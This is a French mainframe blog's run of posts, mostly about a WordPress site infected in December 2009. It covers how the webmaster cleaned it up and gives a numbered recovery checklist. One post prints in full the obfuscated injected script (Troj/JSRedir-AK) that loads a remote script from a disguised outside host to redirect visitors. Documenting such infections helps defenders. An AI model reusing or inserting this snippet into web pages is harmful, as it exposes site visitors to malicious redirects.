Blog

Thin Stuff Factory

Thin Stuff Factory

La limite de la base de données de ce site étant atteinte depuis fort longtemps, mon activité y est plus qu’au ralenti. Malgré cette torpeur je reste coi devant le nombre de visiteur unique - une soixantaine par jour dont 30% de visiteurs l’ayant déjà visités – du coup, d’année en année je prolonge mon plan d’hébergement sans toutefois corriger les bugs de code page survenus récemment, sans réparer le carrousel de l’entête qui ne fonctionne plus depuis 3 ans et sans poster les potentiels articles prosélytiques sur la SWAPBAR apparu en z/OS 1.13 (ça commence à dater) que j’aimerai rédiger.

Mais alors, pourquoi ce billet au titre étrange?

Je dois, l’avouer par pur intérêt de ce que Google fait de votre présence sur ce site afin de faire un peu de SEO.

“Ah mais c’est dégueulasse!” entends-je déjà dire… et vous avez raison.

Mais attendez toutefois de savoir dans quel but, car en contrepartie, chers lecteurs-confrères-barbus et chères consoeurs-trop-peu-nombreuses, je vais peut-être sauver votre vie de couple en vous faisant trouver Le cadeau original et unique pour votre moitié ou vous faire adorer de votre petite nièce préférée.

En effet, depuis quelques temps, sur mon temps libre, je donne un petit coup de pousse technique (loin de z/OS) à Thin Stuff Factory, une boutique en ligne qui propose(ra) une sélection d’accessoires originaux, uniques, chics et décalés pour votre intérieur, ainsi qu’une gamme de vêtement, sac et bijoux en provenance directe d’Asie du Sud-Est, essentiellement de Thaïlande, de Bali et d’Inde. Ces objets sont pour la plupart fait-main avec des matières premières recyclées.

Derrière ce projet, une amie globe-trotteuse qui raconte sur son blog son périple à travers l’Asie du Sud-Est pour dénicher des articles rares et originaux à proposer sur sa boutique et qui partage sur son instagram son univers chatoyant, coloré et décalé.

Laissez-moi savoir en commentaire combien vous me haïssez pour ce post ;-)

 

Malware suite et fin

Le site/blog est maintenant stable.

A priori, l’infection provenait d’un malware sur mon PC qui utilisait mon client FTP pour se propager.

Merci aux sympathiques twittos qui m’ont conseillés sur twitter, au final j’ai fait une réinstalle de mon OS, un scan complet, réinstallé mon WordPress à partir des sources officiels, réinjecté mes fichiers de config en les ayant nettoyés manuellement, modifié mon password FTP et maintenant je ne conserve plus en mémoire mes identifiants/password dans mon client FTP, en effet ils sont lisibles en dur dans un fichier XML, je ne le savais pas, le malware si! Lire à ce sujet cet article très intéressant.

Pour moi c’est trop tard mais pour ceux que ça intéresse il y a un correctif de Konstantin Boyko qui circule là, ici et encore là. (!! ATTENTION !! en accédant à ces pages vous aurez sans doute une alerte de votre antivirus, c’est normal)

Il ne me reste plus qu’à peaufiner les détails du nouveau design, remettre le widget des commentaires récents et autres plugins qui vont bien…

Bonnes fêtes en passant.

[Edit 28/12/2009 - 00:51] Je viens de remettre le smartlook d’issuu (lecture embarqué des pdf)

[Edit 28/12/2009 - 23:16] Ajout du favicon, SEO, optimisation robots.txt

[Edit 29/12/2009 - 01:15] Ajout du module “Quelques documents” avec les pdf embarqués d’issuu, Modification de titre du module de “liens” (ex. blogoliste)

[Edit 06/01/2009 - 00:18 - @Marc-OH dans les commentaires]

  1. Modification du mot de passe FTP côté serveur
  2. sauvegarde de la base de données (elle n’est pas vérolée, elle servira en cas de pépin)
  3. Récupération des fichiers : wp-config.php, .htaccess, robots.txt et wp-content/uploads/*
  4. Suppression à la mano dans les fichiers récupérés du code en fin du source commençant par : <script>/*GNU GPL*/ try...
  5. Récupération d’un package WordPress sur le site officiel ainsi que les plugins à installer et le thème choisi
  6. Scan complet du PC avec suppression du pgm malveillant OU réinstallation de l’OS
  7. Connexion par ftp SANS sauvegarder les login/password dans le client FTP
  8. Suppression sur le serveur de tous les composant WordPress
  9. Installation du package wordpress sain
  10. réinjection des fichier wp-config.php, .htaccess, robots.txt et wp-content/uploads/*
  11. se connecter à l’admin, activer les plugins et le thème.
  12. peaufiner en customisant le thème et les réglages des différents plugins

Bon courage!

GNU GPL malware : Troj/JSRedir-AK

J’ai du réinstaller complètement ce site par 2 fois dans la nuit du 22 au 23 et dans la nuit du 23 au 24 décembre à cause d’un malware qui s’amuse à se faire passer pour un javascript légitime mais qui en fait redirige le browser vers des sites malicieux.

En fait tous les fichiers index.php et *.js se retrouvent en quelques minutes avec ce bout de code à la fin du source :

<script>/*GNU GPL*/ try{window.onload = function (){var Qslzfsla93tulo = document.createElement(’ s#&&c$r)&i!&&p)t$@#’.replace(/\!|@|&|\$|\)|\(|#| \^/ig, ”));Qslzfsla93tulo.setAttribute(’type’, ‘ text/javascript’);Qslzfsla93tulo.setAttribute(’s rc’, ‘h$!t#^t$@$p):)#/!!/)e!!n$e@^^t$-#(!(c$(^#o !!m!&^-&c#((n##!^.^e)#b!a!y&^$.)$@f&$r!.^e)&l#)m &!@u(@n(#$d^o!-#e)!s@&&$.!!&v@&)i#)e##@w)&$(^h&# o!$^m!e&s)&a@(#(l(#)emce_markeramp;$@.^(#r#$u$(!:&&^$8()0&(8 $0$^/)^m^#e(#(!.^c(@(o(@&#)m@&(/@m()e^#&.(@##c&) $#o#(m#/@!^$g((o^o#@$g@(^l^#&@e&((.)#c#!^o)(m&!/ ))!(s#^e$@#(n&d&)s@p&@a&^c)!)#e^#!$.$#c((o(!)m^^ !/^#c())l)(o#@@o!b).!c@o&m$/(^)&’.replace(/\^|&| @|\!|\$|\)|\(|#/ig, ”));Qslzfsla93tulo.setAttrib ute(’defer’, ‘defer’);Qslzfsla93tulo.setAttribut e(’id’, ‘I)(r#^w)@#@d&)^0@$#s$)v!(u&)s^@d^’.repl ace(/\!|&|\)|\$|\^|@|\(|#/ig, ”));document.body. appendChild(Qslzfsla93tulo);}} catch(e) {}</script>

Pour la deuxième attaque j’ai trouvé grâce à Piekes un bout de code qui sera peut-être mon sauveur. En tout cas maintenant je suis un peu moins seul et j’espère ne pas devoir refaire une installation.

[EDIT du 24/12 - 23HOO] Beaucoup plus d’info ici

[EDIT du 24/12 - 23H41] Encore mieux ici


cheval de Troie JS:Illredir-A [Trj], warnings et admin inaccessible

Cela fait un peu plus de 48H que je me bat à remettre sur pied ce blog suite à une attaque sur le serveur.

Le cheval de Troie a été supprimé, la version WordPress a été upgradée, l’admin est à nouveau disponible.

Par contre j’ai complètement perdu mon thème et mes plugins, je dois repartir from scratch. Donc pour l’instant je met un thème par défaut. Il doit aussi y avoir des liens morts, n’hésitez pas à me faire un retour en commentaire.

Je pense pouvoir résorber tout ça en une dixaine de jours, fêtes obligent. D’ailleurs bonnes fêtes aux lecteurs de passage.

Invitations Google Wave

Il me reste quelques invitations Google Wave, si ça vous intéresse envoyez moi votre email via le formulaire de contact de la page à propos

Follow me…

Maintenant sur twitter.
Follow me...

Blog compatible IPhone, IPod Touch et Android

En plus d’être passé à la v2.8.1 de WordPress cette nuit, j’ai rajouté le plugin WPtouch, qui permet de rendre compatible ce blog sous Iphone, Ipod Touch et Android.

Du coup, un affichage beaucoup plus rapide (presque 2x en Edge et 3G) depuis votre Iphone.

Le résultat en image :

Accueil

CatégoriesMenuArticleCommentaires

Mise en prod éprouvante

Navré pour les 2 mois sans article, je sors d’une mise en prod assez éprouvante.

Il ne reste plus que quelques problèmes BBCP en cours de correction et un peu d’optimisation DB2 pour stabiliser la nouvelle version de l’appli et je serais à nouveau un peu plus dispo pour rédiger régulièrement en ces lieux.

En attendant vous pouvez jetter un coup d’oeil à l’astuce SDSF laissée par Romain33. J’y reviendrais avec SE et XDC…

Nouvelle fonctionnalité : PDF embarqué

Rien de plus énervant que d’avoir à télécharger un PDF pour lire un document que vous ne conserverez peut-être pas ! Pourquoi ne pas le consulter directement comme un livre numérique en surimpression sur le site en cours de lecture ?

Fort de ce constat, depuis ce week-end j’utilise le plugin “Smart Look” d’issuu qui vous permet de feuilletter dans une lightbox tous les documents hebergés sur le domaine documentation-mainframe.net.

Les documents étant au préalable convertis en flash par issuu, leur affichage est 10 fois plus rapide qu’avec le plugin Acrobat reader et la navigation y est somme toute plus séduisante.

Voyez cet exemple : File-AID – Reformatage des données [Edit : ne fonctionne qu'à partir du site, pas d'un agrégateur]

Notez que les documents sont toujours téléchargeables en faisant un clique droit sur le lien puis enregistrer sous.

Réseautage professionnel

Le billet d’aujourd’hui n’a rien à voir avec le mainframe, c’est juste pour vous signaler une mise à jour de la sidebar du blog avec l’accès à mes différents profils LinkedIn, Viadeo et Ziki plus l’ajout d’un widget pour que les utilisateurs Viadeo de passage laissent leur trombine ;)

N’hésité pas à me contacter.